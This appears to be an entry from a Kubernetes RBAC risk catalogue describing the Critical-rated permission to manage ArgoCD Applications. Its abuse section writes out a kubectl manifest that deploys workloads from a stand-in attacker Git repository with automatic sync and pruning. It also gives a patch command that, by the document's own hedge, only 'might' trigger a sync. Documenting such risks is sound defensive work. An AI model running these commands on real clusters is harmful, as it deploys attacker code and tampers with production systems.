Manage ArgoCD Applications (argoproj.io)
Tampering
Critical
Overview
| Field | Value |
|---|---|
| ID | 1063 |
| Name | Manage ArgoCD Applications (argoproj.io) |
| Risk Category | Tampering |
| Risk Level | Critical |
| Role Type | Role |
| API Groups | argoproj.io |
| Resources | applications |
| Verbs | create, update, patch, delete, sync |
| Tags | CodeExecution PotentialPrivilegeEscalation Tampering WorkloadDeployment |
Description
Grants permission to manage ArgoCD Application resources. This allows deploying, modifying, or deleting applications managed by ArgoCD, potentially leading to the deployment of malicious workloads, unauthorized code execution, tampering with production systems, and privilege escalation if ArgoCD has high privileges.
Abuse Scenarios
- Create a new ArgoCD Application pointing to a malicious Git repository.
kubectl create -n <namespace> -f - <<EOF
apiVersion: argoproj.io/v1alpha1
kind: Application
metadata:
name: malicious-app
spec:
destination:
namespace: <target-namespace>
server: https://kubernetes.default.svc
project: default
source:
repoURL: https://github.com/attacker/malicious-manifests.git
targetRevision: HEAD
path: .
syncPolicy:
automated:
prune: true
selfHeal: true
EOF
# Example: kubectl create -n argocd -f - <<EOF ... EOF
- Force synchronization of an ArgoCD Application to deploy changes immediately.
kubectl patch application <application-name> -n <namespace> --type='merge' -p='{"status": {"operationState": {"phase": "Running", "syncResult": {"resources": []}}}}'
# Note: Direct 'sync' verb via kubectl is not standard. This patch might trigger a sync.
# A more direct way is using the ArgoCD CLI: `argocd app sync <application-name> -n <namespace>`
# Example: kubectl patch application my-app -n argocd --type='merge' -p='{"status": {"operationState": {"phase": "Running", "syncResult": {"resources": []}}}}'